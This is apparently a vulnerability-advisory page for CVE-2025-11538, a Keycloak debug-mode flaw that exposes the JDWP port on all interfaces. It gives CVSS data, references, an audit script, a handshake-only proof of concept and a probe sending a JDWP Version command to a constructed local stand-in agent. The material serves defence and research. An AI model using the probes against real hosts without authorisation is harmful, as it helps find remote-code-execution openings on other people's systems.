Security Vulnerability Report
CVE-2025-11538 CVSS 6.8 MEDIUM

CVE-2025-11538

Published: 2025-11-13 17:15:45
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability exists in Keycloak's server distribution where enabling debug mode (--debug <port>) insecurely defaults to binding the Java Debug Wire Protocol (JDWP) port to all network interfaces (0.0.0.0). This exposes the debug port to the local network, allowing an attacker on the same network segment to attach a remote debugger and achieve remote code execution within the Keycloak Java virtual machine.
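Whether the debug agent is reachable from the network comes down to the host part of the JDWP agent's address= option. Since JDK 9 the dt_socket connector listens on loopback only when given a bare port (address=8787) or a loopback host, and on every interface only when given address=*:8787 or an unspecified address such as 0.0.0.0; the latter is the state the description calls out. The following added example, which is not code from this page or from the Keycloak project, audits JVM command lines for that setting. The command lines it checks are constructed, and it assumes nothing about how kc.sh assembles the option internally.

```python
import re
import subprocess

# Matches the JDWP agent option in either spelling: -agentlib:jdwp=... (JDK 5+)
# or the legacy -Xrunjdwp:... form.
JDWP_OPT = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")

LOOPBACK_HOSTS = {"", "localhost", "127.0.0.1", "::1", "[::1]"}
WILDCARD_HOSTS = {"*", "0.0.0.0", "::", "[::]"}


def classify_jdwp(cmdline):
    """Classify the JDWP listener of one JVM command line.

    Returns (exposure, port) where exposure is 'none', 'loopback', 'all' or
    'host:<addr>'. Applies the dt_socket rule in force since JDK 9: a bare
    port or a loopback host listens on loopback only, while '*' or an
    unspecified address ('0.0.0.0', '::') listens on every interface.
    """
    m = JDWP_OPT.search(cmdline)
    if not m:
        return "none", None
    opts = {}
    for item in m.group(1).split(","):
        key, _, value = item.partition("=")
        opts[key] = value
    # Only a dt_socket agent in server mode opens a listening TCP port;
    # server=n makes the JVM dial out to a waiting debugger instead.
    if opts.get("transport") != "dt_socket" or opts.get("server", "n") != "y":
        return "none", None
    host, _, port = opts.get("address", "").rpartition(":")
    if host in LOOPBACK_HOSTS:
        return "loopback", port
    if host in WILDCARD_HOSTS:
        return "all", port
    return f"host:{host}", port


def audit(cmdlines):
    """Return (exposure, port, cmdline) for every JVM reachable beyond loopback."""
    findings = []
    for line in cmdlines:
        exposure, port = classify_jdwp(line)
        if exposure not in ("none", "loopback"):
            findings.append((exposure, port, line))
    return findings


# Constructed command lines (not captured from a real host) covering the
# wildcard bind, the loopback-only form, and two cases with no listener.
SAMPLE_CMDLINES = [
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:8787 -jar lib/quarkus-run.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8787 -jar lib/quarkus-run.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=0.0.0.0:8787 -jar app.jar",
    "java -Xrunjdwp:transport=dt_socket,server=n,address=devbox:5005 -jar app.jar",
    "java -jar lib/quarkus-run.jar start",
]


def running_jvm_cmdlines():
    """Command lines of live processes that carry a jdwp option (Linux/macOS, via ps)."""
    out = subprocess.run(["ps", "-eo", "args="], capture_output=True, text=True, check=True).stdout
    return [line for line in out.splitlines() if "jdwp" in line]


if __name__ == "__main__":
    # Swap SAMPLE_CMDLINES for running_jvm_cmdlines() to audit the local host.
    for exposure, port, line in audit(SAMPLE_CMDLINES):
        print(f"[!] JDWP listening on {exposure} interfaces, port {port}: {line}")
```

On a host you suspect, cross-check the classification against the actual socket table (for example `ss -ltnp` on Linux and look at the local address of the JDWP port): a loopback bind shows 127.0.0.1 or ::1, a wildcard bind shows 0.0.0.0 or [::]. The durable fix is to keep the agent on loopback and reach it through an SSH port forward or an equivalent tunnel rather than opening the port on the LAN.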

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

The NVD record carries no CPE configuration data. The version ranges below are listed by this page, not by the NVD record; confirm them against the Red Hat errata and the Keycloak fix commit cited in the references before relying on them.

Keycloak < 26.0.0 (with debug mode enabled)
Keycloak < 25.0.6 (with debug mode enabled)
Keycloak < 24.0.10 (with debug mode enabled)
Red Hat Single Sign-On 7.6.x (affected via Keycloak)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import sys


def exploit_keycloak_jdwp(target_host, debug_port, timeout=5.0):
    """
    CVE-2025-11538 PoC - checks whether a JDWP listener is reachable.
    A completed JDWP handshake proves that a debug agent accepts remote
    connections; an attacker could then attach a debugger and run code in
    the JVM. This script stops after the handshake and executes nothing on
    the target. It also cannot tell a Keycloak JVM from any other JVM with
    an exposed agent.
    """
    try:
        # Step 1: Handshake with JDWP. Both sides exchange the literal
        # 14-byte string 'JDWP-Handshake'.
        sock = socket.create_connection((target_host, int(debug_port)), timeout=timeout)
        handshake = b'JDWP-Handshake'
        sock.sendall(handshake)
        # recv() may return fewer bytes than requested; read until all 14 arrive
        response = b''
        while len(response) < len(handshake):
            chunk = sock.recv(len(handshake) - len(response))
            if not chunk:
                break
            response += chunk
        sock.close()
        if response != handshake:
            print('[-] JDWP handshake failed')
            return False
        print('[+] JDWP handshake successful - Target is vulnerable!')
        print(f'[+] Debug port {debug_port} is exposed on {target_host}')
        print('[*] Attacker can now attach debugger and execute code')
        # Note: Full RCE requires JDWP protocol commands
        # This PoC confirms the exposure only
        return True
    except (OSError, ValueError) as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f'Usage: {sys.argv[0]} <target_host> <debug_port>')
        sys.exit(1)
    exploit_keycloak_jdwp(sys.argv[1], sys.argv[2])
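The handshake alone tells you only that something echoed 14 bytes. The added example below, which is not code from this page or from the Keycloak project, goes one step further and issues the JDWP VirtualMachine.Version command (command set 1, command 1), then parses the reply. A well-formed reply both confirms a real JDWP agent and names the JVM behind it, which is what you want in a finding. It ships with a constructed in-process stand-in for an exposed agent so that it runs offline; the version strings that stand-in returns are made up. Attaching a full debugger to run code is not shown.

```python
import socket
import struct
import threading

HANDSHAKE = b"JDWP-Handshake"
# JDWP command set 1 (VirtualMachine), command 1 (Version)
CMD_VM_VERSION = (1, 1)


def _recv_exact(sock, n):
    """Read exactly n bytes; a plain recv() may return a short read."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during read")
        buf += chunk
    return buf


def _read_string(data, off):
    """JDWP string: 4-byte big-endian length followed by UTF-8 bytes."""
    (n,) = struct.unpack_from(">I", data, off)
    return data[off + 4:off + 4 + n].decode("utf-8"), off + 4 + n


def _encode_string(s):
    b = s.encode("utf-8")
    return struct.pack(">I", len(b)) + b


def jdwp_version(host, port, timeout=3.0):
    """Handshake, then send VirtualMachine.Version and parse the reply.

    Returns a dict with the agent description, JDWP version and VM name,
    or raises if the listener does not behave like a JDWP agent.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(HANDSHAKE)
        if _recv_exact(sock, len(HANDSHAKE)) != HANDSHAKE:
            raise ConnectionError("not a JDWP listener")
        # Command packet header: length, id, flags (0 = command), command set, command
        packet_id = 1
        sock.sendall(struct.pack(">IIBBB", 11, packet_id, 0, *CMD_VM_VERSION))
        # Reply packet header: length, id, flags (0x80 = reply), 2-byte error code
        length, rid, flags, err = struct.unpack(">IIBH", _recv_exact(sock, 11))
        if rid != packet_id or flags != 0x80 or err != 0:
            raise ConnectionError(f"unexpected reply id={rid} flags={flags:#x} err={err}")
        body = _recv_exact(sock, length - 11)
        description, off = _read_string(body, 0)
        major, minor = struct.unpack_from(">ii", body, off)
        off += 8
        vm_version, off = _read_string(body, off)
        vm_name, off = _read_string(body, off)
        return {"description": description, "jdwp": f"{major}.{minor}",
                "vm_version": vm_version, "vm_name": vm_name}


def start_fake_jdwp_agent():
    """Constructed stand-in for an exposed agent: serves one client on loopback.

    Returns the port it listens on. The strings it reports are invented.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            if _recv_exact(conn, len(HANDSHAKE)) != HANDSHAKE:
                return
            conn.sendall(HANDSHAKE)
            _, rid, _flags, cset, cmd = struct.unpack(">IIBBB", _recv_exact(conn, 11))
            if (cset, cmd) == CMD_VM_VERSION:
                body = (_encode_string("Java Debug Wire Protocol (Reference Implementation) version 21.0")
                        + struct.pack(">ii", 21, 0)
                        + _encode_string("21.0.4")
                        + _encode_string("OpenJDK 64-Bit Server VM"))
                conn.sendall(struct.pack(">IIBH", 11 + len(body), rid, 0x80, 0) + body)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_fake_jdwp_agent()
    print(jdwp_version("127.0.0.1", port))
```

Against a real target, call jdwp_version(host, port) directly. The reply carries no application name, so the VM strings only identify the JDK; tying the port to Keycloak still needs the host-side process list or the service's own configuration.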

References

https://access.redhat.com/errata/RHSA-2025:21370
https://access.redhat.com/errata/RHSA-2025:21371
https://access.redhat.com/security/cve/CVE-2025-11538
https://bugzilla.redhat.com/show_bug.cgi?id=2402622
https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9
https://github.com/keycloak/keycloak/pull/43574

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11538", "sourceIdentifier": "[email protected]", "published": "2025-11-13T17:15:44.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in Keycloak's server distribution where enabling debug mode (--debug <port>) insecurely defaults to binding the Java Debug Wire Protocol (JDWP) port to all network interfaces (0.0.0.0). This exposes the debug port to the local network, allowing an attacker on the same network segment to attach a remote debugger and achieve remote code execution within the Keycloak Java virtual machine."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1327"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:21370", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21371", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-11538", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402622", "source": "[email protected]"}, {"url": "https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9", "source": "[email protected]"}, {"url": "https://github.com/keycloak/keycloak/pull/43574", "source": "[email protected]"}]}}